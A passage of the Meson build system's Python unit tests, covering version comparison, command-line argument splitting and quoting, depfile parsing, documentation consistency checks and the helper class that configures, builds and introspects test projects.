return 0, '-L{} -lbar'.format(p2.as_posix())
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix())
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
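# Hedged sketch (not part of the original suite): the DepFile API exercised by
# test_depfile above, shown on a minimal single-rule depfile.
def _example_depfile_usage():
    dep = mesonbuild.depfile.DepFile(['generated.c: template.c.in gen.py'])
    return dep.get_all_dependencies('generated.c')  # == {'template.c.in', 'gen.py'}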
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE)) + [None]
for s1, s2 in zip(sections[:], sections[1:]):
if s1.group(1) == "Universal options":
# Extract the content for this section
end = s2.start() if s2 is not None else len(md)
content = md[s1.end():end]
subsections = list(re.finditer(r"^### (.+)$", content, re.MULTILINE)) + [None]
for sub1, sub2 in zip(subsections[:], subsections[1:]):
if sub1.group(1) == "Directories" or sub1.group(1) == "Core options":
# Extract the content for this subsection
sub_end = sub2.start() if sub2 is not None else len(content)
subcontent = content[sub1.end():sub_end]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) .* \|", subcontent, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(len(found_entries & arches), 0)
found_entries |= arches
break
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md") as f:
md = f.read()
self.assertIsNotNone(md)
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE))
for s1, s2 in zip(sections[::2], sections[1::2]):
if s1.group(1) == "CPU families":
# Extract the content for this section
content = md[s1.end():s2.start()]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt") as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that the syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path; otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs, CI will just abort. It is very hard to distinguish
# between a CI issue and a test bug in that case. Set a timeout and fail loudly
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
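# The captured output ends with a trailing newline, so [-1] after the split
# is an empty string and [-2] is the final status line (e.g. 'ninja: no work to do.').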
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
clre = re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)
linkre = re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)
self.assertNotRegex(ret, clre)
self.assertNotRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
